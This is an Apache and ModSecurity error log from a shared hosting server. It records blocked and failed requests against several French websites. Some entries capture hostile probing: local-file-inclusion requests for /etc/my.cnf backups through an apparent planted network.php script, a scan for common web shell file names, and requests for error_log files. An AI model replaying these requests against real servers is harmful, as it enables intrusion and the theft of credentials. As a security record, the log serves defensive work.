[Mon May 11 13:59:51.331968 2026] [ssl:error] [pid 1319886:tid 1319934] (EAI 2)Name or service not known: [client 155.94.203.197:42669] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:51.332015 2026] [ssl:error] [pid 1319886:tid 1319934] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:53.306216 2026] [ssl:error] [pid 1319886:tid 1319914] (EAI 2)Name or service not known: [client 200.239.226.186:42455] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:53.306368 2026] [ssl:error] [pid 1319886:tid 1319914] AH01941: stapling_renew_response: responder error
[Mon May 11 13:59:54.184903 2026] [ssl:error] [pid 1319953:tid 1319969] (EAI 2)Name or service not known: [client 108.67.63.229:41535] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:59:54.184934 2026] [ssl:error] [pid 1319953:tid 1319969] AH01941: stapling_renew_response: responder error
[Mon May 11 14:00:24.293923 2026] [security2:error] [pid 1320398:tid 1320421] [client 114.119.148.14:31591] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: f2c66238be477a28791ff6a7a740d4cc||1778502620||1778502260"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/resultat/"] [unique_id "agHE2OJEyNRN152ArORvzgAAAFU"]
[Mon May 11 14:00:24.294292 2026] [security2:error] [pid 1320398:tid 1320421] [client 114.119.148.14:31591] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/resultat/"] [unique_id "agHE2OJEyNRN152ArORvzgAAAFU"]
[Mon May 11 14:00:25.730733 2026] [security2:error] [pid 1320398:tid 1320421] [client 114.119.148.14:31591] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agHE2OJEyNRN152ArORvzgAAAFU"]
[Mon May 11 14:01:19.684664 2026] [security2:error] [pid 1320674:tid 1320692] [client 102.165.1.152:52137] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHFD6O9RdIr1DwxYR143QAAAMI"], referer: https://www.piregwan-genesis.com/
[Mon May 11 14:01:43.335661 2026] [security2:error] [pid 1320398:tid 1320404] [client 43.130.67.33:44334] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agHFJ-JEyNRN152ArORwZQAAAEQ"]
[Mon May 11 14:02:11.107374 2026] [security2:error] [pid 1319885:tid 1319891] [client 43.153.74.75:43368] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-mobilite-regional.com"] [uri "/"] [unique_id "agHFQ1chVQ3tCn0m9Oo9xAAAAQM"]
[Mon May 11 14:02:14.716299 2026] [security2:error] [pid 1320398:tid 1320415] [client 43.153.74.75:51116] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHFRuJEyNRN152ArORwnQAAAE8"], referer: http://pole-mobilite-regional.com
[Mon May 11 14:02:19.190474 2026] [security2:error] [pid 1320398:tid 1320421] [client 43.153.74.75:58894] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agHFS-JEyNRN152ArORwqAAAAFU"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 14:02:30.041369 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-instagram/error_log
[Mon May 11 14:02:37.652860 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-stylekit-selector/error_log
[Mon May 11 14:02:39.199996 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/acf-flo-stylekit-selector/error_log
[Mon May 11 14:02:40.776376 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/advanced-custom-fields-number-slider/error_log
[Mon May 11 14:02:42.309315 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/advanced-custom-fields-number-slider/error_log
[Mon May 11 14:02:43.863438 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 14:02:45.250707 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 14:02:46.815954 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 14:02:48.388635 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-extensions/nav-menu/error_log
[Mon May 11 14:02:57.419167 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/functions/error_log
[Mon May 11 14:02:59.000581 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/functions/error_log
[Mon May 11 14:03:00.563651 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/functions/error_log
[Mon May 11 14:03:02.105480 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/functions/error_log
[Mon May 11 14:03:03.644640 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/plugins-recommendation/error_log
[Mon May 11 14:03:05.039278 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/plugins-recommendation/error_log
[Mon May 11 14:03:10.692898 2026] [security2:error] [pid 1320674:tid 1320701] [client 49.51.183.84:58212] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agHFfqO9RdIr1DwxYR15ZgAAAMs"]
[Mon May 11 14:03:12.149526 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/views/error_log
[Mon May 11 14:03:13.689226 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/views/error_log
[Mon May 11 14:03:15.236477 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/views/error_log
[Mon May 11 14:03:16.779004 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/views/error_log
[Mon May 11 14:03:17.783621 2026] [core:error] [pid 1320674:tid 1320706] [client 195.178.110.64:26722] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.sitebuilder.totalcloud.fr/wp-login.php
[Mon May 11 14:03:17.783970 2026] [core:error] [pid 1320674:tid 1320706] [client 195.178.110.64:26722] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.sitebuilder.totalcloud.fr/wp-login.php
[Mon May 11 14:03:18.177745 2026] [authz_core:error] [pid 1319953:tid 1319965] [client 147.135.212.200:48728] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/views/error_log
[Mon May 11 14:03:51.389730 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 147.135.212.200:51904] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/error_log
[Mon May 11 14:03:52.920367 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 147.135.212.200:51904] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/error_log
[Mon May 11 14:03:54.470876 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 147.135.212.200:51904] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/error_log
[Mon May 11 14:03:55.877788 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 147.135.212.200:51904] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/error_log
[Mon May 11 14:04:03.460487 2026] [authz_core:error] [pid 1319886:tid 1319933] [client 147.135.212.200:51904] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/src/Core32/error_log
[Mon May 11 14:04:40.848221 2026] [:error] [pid 1319998:tid 1320012] [client 192.176.172.166:33102] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 14:04:46.237262 2026] [security2:error] [pid 1319953:tid 1319963] [client 216.73.216.110:11318] ModSecurity: Warning. Matched phrase "etc/my.cnf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/my.cnf found within ARGS:filesrc: /etc/my.cnf.rpmsave_pre_elevate"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHF3uSQ-m-m0ukSShtpPQAAAUg"]
[Mon May 11 14:04:46.238645 2026] [security2:error] [pid 1319953:tid 1319963] [client 216.73.216.110:11318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHF3uSQ-m-m0ukSShtpPQAAAUg"]
[Mon May 11 14:04:46.333744 2026] [security2:error] [pid 1319953:tid 1319963] [client 216.73.216.110:11318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHF3uSQ-m-m0ukSShtpPQAAAUg"]
[Mon May 11 14:05:17.177675 2026] [:error] [pid 1320398:tid 1320412] [client 140.245.50.113:58295] File does not exist: /home/apoefr/public_html/wp-login.php
[Mon May 11 14:05:20.515678 2026] [core:error] [pid 1320674:tid 1320693] [client 44.242.167.95:35812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:05:20.515719 2026] [core:error] [pid 1320674:tid 1320693] [client 44.242.167.95:35812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:06:33.114294 2026] [security2:error] [pid 1320674:tid 1320706] [client 216.73.216.110:20625] ModSecurity: Warning. Matched phrase "etc/my.cnf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/my.cnf found within ARGS:filesrc: /etc/my.cnf.mysqlup.5.6"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHGSaO9RdIr1DwxYR16fAAAANE"]
[Mon May 11 14:06:33.115256 2026] [security2:error] [pid 1320674:tid 1320706] [client 216.73.216.110:20625] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHGSaO9RdIr1DwxYR16fAAAANE"]
[Mon May 11 14:06:33.212473 2026] [security2:error] [pid 1320674:tid 1320706] [client 216.73.216.110:20625] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHGSaO9RdIr1DwxYR16fAAAANE"]
[Mon May 11 14:06:38.658978 2026] [security2:error] [pid 1319886:tid 1319899] [client 175.178.110.121:53478] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.la-grande-fabrique.com"] [uri "/"] [unique_id "agHGTqy-5-wpj6Sx56aAJwAAAAE"]
[Mon May 11 14:07:01.409930 2026] [core:error] [pid 1319953:tid 1319959] [client 52.242.216.199:59542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:01.410269 2026] [core:error] [pid 1319953:tid 1319959] [client 52.242.216.199:59542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:03.746560 2026] [core:error] [pid 1319885:tid 1319896] [client 52.242.216.199:59631] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:03.746604 2026] [core:error] [pid 1319885:tid 1319896] [client 52.242.216.199:59631] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:06.233143 2026] [core:error] [pid 1319885:tid 1319893] [client 52.242.216.199:59587] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:06.233270 2026] [core:error] [pid 1319885:tid 1319893] [client 52.242.216.199:59587] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:07.231255 2026] [core:error] [pid 1320398:tid 1320408] [client 52.242.216.199:59626] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:07.231375 2026] [core:error] [pid 1320398:tid 1320408] [client 52.242.216.199:59626] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:08.911536 2026] [core:error] [pid 1319953:tid 1319967] [client 52.242.216.199:59594] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:08.911572 2026] [core:error] [pid 1319953:tid 1319967] [client 52.242.216.199:59594] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:10.244780 2026] [core:error] [pid 1319998:tid 1320010] [client 52.242.216.199:59635] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:10.244807 2026] [core:error] [pid 1319998:tid 1320010] [client 52.242.216.199:59635] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:11.145602 2026] [core:error] [pid 1319886:tid 1319906] [client 52.242.216.199:59611] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:11.145639 2026] [core:error] [pid 1319886:tid 1319906] [client 52.242.216.199:59611] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:12.322990 2026] [core:error] [pid 1320674:tid 1320710] [client 52.242.216.199:59624] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:12.323025 2026] [core:error] [pid 1320674:tid 1320710] [client 52.242.216.199:59624] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:13.583887 2026] [core:error] [pid 1320674:tid 1320691] [client 52.242.216.199:59537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:13.584011 2026] [core:error] [pid 1320674:tid 1320691] [client 52.242.216.199:59537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:14.792003 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/amax.php
[Mon May 11 14:07:14.950942 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/1index.php
[Mon May 11 14:07:15.109279 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/666.php
[Mon May 11 14:07:15.329641 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:59600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:15.329762 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:59600] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:15.604947 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/ab.php
[Mon May 11 14:07:15.763339 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/chosen.php
[Mon May 11 14:07:16.894202 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/about.php
[Mon May 11 14:07:17.058824 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/wp-index.php
[Mon May 11 14:07:17.216972 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/1.php
[Mon May 11 14:07:17.228545 2026] [core:error] [pid 1319885:tid 1319888] [client 52.242.216.199:59634] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:17.228575 2026] [core:error] [pid 1319885:tid 1319888] [client 52.242.216.199:59634] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:17.542134 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/config.php
[Mon May 11 14:07:17.858632 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/test1.php
[Mon May 11 14:07:18.032543 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/222.php
[Mon May 11 14:07:18.538795 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/aa.php
[Mon May 11 14:07:19.382393 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/wp.php
[Mon May 11 14:07:19.757705 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/cd.php
[Mon May 11 14:07:20.274228 2026] [core:error] [pid 1319886:tid 1319911] [client 52.242.216.199:59584] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:20.274263 2026] [core:error] [pid 1319886:tid 1319911] [client 52.242.216.199:59584] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
